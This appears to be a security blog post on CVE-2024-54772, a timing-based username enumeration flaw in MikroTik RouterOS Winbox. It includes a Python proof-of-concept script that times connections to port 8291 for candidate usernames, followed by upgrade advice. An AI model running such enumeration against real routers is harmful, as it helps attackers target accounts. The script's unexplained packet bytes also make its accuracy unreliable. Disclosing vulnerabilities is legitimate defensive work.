CVE-2024-54772 - Timing Attack Vulnerability in MikroTik RouterOS Winbox Service for User Account Enumeration

A recently discovered vulnerability, CVE-2024-54772, affects the Winbox service of MikroTik RouterOS, allowing potential attackers to enumerate user accounts based on the difference in response times between valid and invalid usernames. The issue has been found to impact RouterOS versions 6.43 through 7.16.1.

In this post, we will go through the details of the vulnerability, provide a code snippet to demonstrate the attack, and refer you to the original sources for further information. Ensuring the security of your MikroTik routers is of utmost importance, so understanding this exploit is crucial.

Exploit Details

The core of the CVE-2024-54772 vulnerability lies in the way the Winbox service of MikroTik RouterOS processes authentication requests. When a client tries to connect to the service with a username, the server returns a response after a certain amount of time. The time taken for the server to respond differs based on whether the entered username is valid or not.

Attackers can exploit this discrepancy in response times to enumerate valid user accounts on the system. By sending a series of authentication requests with different usernames, they can compare the response times and identify the usernames that yield faster or slower responses, indicating valid user accounts. Once an attacker has access to valid usernames, they can use this information to further target the affected system with brute-force attacks or spear-phishing campaigns.

Code Snippet

Below is a simple Python code snippet demonstrating how an attacker could exploit this vulnerability to enumerate user accounts.

import time
import socket

routeros_ip = "192.168.1.1"
routeros_port = 8291

def connect(username):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((routeros_ip, routeros_port))

    s.send(b'\x01' + bytes(username, 'utf-8') + b'\x00\x21\x00\x01\x00\x01\x00\x08\x03\x00\x00\x21\x00\x04')

    s.recv(1024)
    s.close()

usernames = ['admin', 'user1', 'user2', 'invalid']

for username in usernames:
    start = time.time()
    connect(username)
    end = time.time()

    print(f'{username}: {end - start}')

Replace 192.168.1.1 with the IP address of your RouterOS device and usernames with a list of potential usernames to test.

For full details of this vulnerability, please refer to the following resources

1. MikroTik RouterOS Security Advisory: https://mikrotik.com/security_advisory

2. CVE-2024-54772 - National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-54772

Mitigation

MikroTik has been informed about this vulnerability and has patched the affected RouterOS versions. It is highly recommended to upgrade your RouterOS devices to the latest version to ensure your systems are protected from this issue. More information on the patch can be found in MikroTik's official security advisory.

Conclusion

The timing attack vulnerability (CVE-2024-54772) in the Winbox service of MikroTik RouterOS poses a significant risk to the security of affected systems. By understanding the exploit and upgrading to the latest RouterOS version, you can protect your network from attackers attempting to enumerate user accounts based on response time discrepancies.

Timeline

Published on: 02/11/2025 23:15:09 UTC
Last modified on: 02/12/2025 22:15:40 UTC